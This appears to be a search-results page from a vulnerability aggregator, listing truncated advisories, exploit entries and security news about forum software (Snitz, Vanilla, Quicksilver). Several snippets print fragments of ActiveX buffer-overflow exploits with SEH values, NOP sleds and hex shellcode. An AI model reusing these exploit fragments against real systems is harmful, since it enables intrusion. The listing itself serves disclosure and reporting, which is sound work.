1491 matches found
Snitz Forums 2000 3.4.6 Pop_Mail.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20712/info Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability
No description provided by source. WWW.SecurityWall.orG Quicksilver Forums v1.2.0+1.2.1 setincludepath Remote File Inclusion Vulnerabilities Author: mdx Class : Remote cont@ct: bilkopatathotmaildotcom v1.2.0+v1.2.1 Code: activeutil.php? requireonce $set'includepath' . '/lib/bbcode.php'; Exploit:...
Snitz Forums 2000 Register.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7549/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. Snitz is back-ended by a database and supports Microsoft Access 97/2000, SQL Server 6.5/7.0/2000 and MySQL. It i...
Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20004/info Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. This could allow an attacker to steal cookie-based authentication credentials and...
Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/27162/info Snitz Forums 2000 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in t...
AoA MP4 Converter ActiveX
Exploit for windows platform in category local exploits Exploit Title: AoA MP4 Converter ActiveX Date: 19.05.2014 Author:metacom Website: www.rstforums.com Software Link: www.aoamedia.com/AoAMP4Converter.exe Version: 4.1.2 Tested on: Windows xp sp3EN IE 6.0 nse="\xEB\x06\x90\x90";...
AoA DVD Creator 2.6.2 - ActiveX
nseh="\xEB\x06\x90\x90"; seh="\x1f\x5c\x03\x10"; nops="\x90"; while nops.length10 nops+="\x90"; shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+...
AoA Audio Extractor Basic 2.3.7 - ActiveX
nse="\xEB\x06\xff\xff"; seh="\x58\xE4\x04\x10"; nops="\x90"; while nops.length10 nops+="\x90"; shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+...
Why Full Disclosure Still Matters
When the venerable Full Disclosure security mailing list shut down abruptly last month, many in the security community were surprised. But a lot of people, even those who had been members of the list for a long time, greeted the news with a shrug. Twitter, blogs and other outlets had obviated the...
[Dumb0] A simple tool to dump users in popular forums and CMS
A simple tool to dump users in popular forums and CMS like: WordPress, SMF, vBulletin, IP Board, XEN forums, myBB, useBB, vanilla, bbPress, etc... Download Dumb0...
Learn How DuckDuckGo Search Engine helps you to be a Good Programmer
So you want to be a Programmer? Want to learn - How to code, Debug, and Program? The Web is full of free resources that can turn you into a programmer in no time, but never knew Where to start or How to troubleshoot your programs. Learning How to be a good programmer begins with learning logic...
List of 8,000 FTP Credentials for Sale in Underground Forums
Hackers are targeting FTP upload sites with the hopes of redirecting victims to spam or even infecting webservers that rely on FTP applications for updates. Hold Security reported yesterday it had secured a list of credentials for close to 7,800 FTP sites being circulated in cybercrime forums. Th...
OpenSUSE Forums Hacked, User Email Addresses Compromised
The forums for the Linux-based operating system openSUSE remain down today and for the foreseeable future following a hack earlier this week that appears to have compromised some of its users’ email addresses. OpenSUSE claims the hacker was able to exploit a vulnerability in the forum’s software,...
Atrax Kit Boasts Tor Connectivity, Bitcoin Extraction
Yet another commercial crimekit has been spotted making the rounds on the underground malware forums that uses the anonymity network Tor to stealthily communicate with its command and control servers. While it isn’t the first of its kind to use Tor, the kit, nicknamed Atrax, is cheap and comes wi...
MacRumors Forums Hacked, Passwords Stolen
The hacker behind the MacRumors Forums breach said the attack was “friendly” and that none of the data accessed will be leaked. Editorial Director Arnold Kim confirmed to Threatpost that a post on the forums from the hacker is legitimate. Kim posted an advisory on the forum on Monday informing...
millions stolen in Bitcoin heist
More trouble for Bitcoin this week after an Australian wallet service admitted that attackers broke into their systems and made off with more than $1.2 million worth of the digital crypto-currency. The theft comes on the coat-tails of a contentious research paper claiming that a...
Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection
------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize them & save them if necessary 327. $Messages = GdnFormat::Unserialize$Messages;...
Vanilla Forums 2.0 2.0.18.5 - class.utilitycontroller.php PHP Object Injection
------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize...
Vanilla Forums 2.0 - 2.0.18.5 PHP Object Injection Vulnerability
Exploit for php platform in category web applications ------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize them & save them if...
[KIS-2013-09] Vanilla Forums <= 2.0.18.5 (class.utilitycontroller.php) PHP Object Injection Vulnerability
------------------------------------------------------------------------------------------- Vanilla Forums = 2.0.18.5 class.utilitycontroller.php PHP Object Injection Vulnerability ------------------------------------------------------------------------------------------- - Software Link:...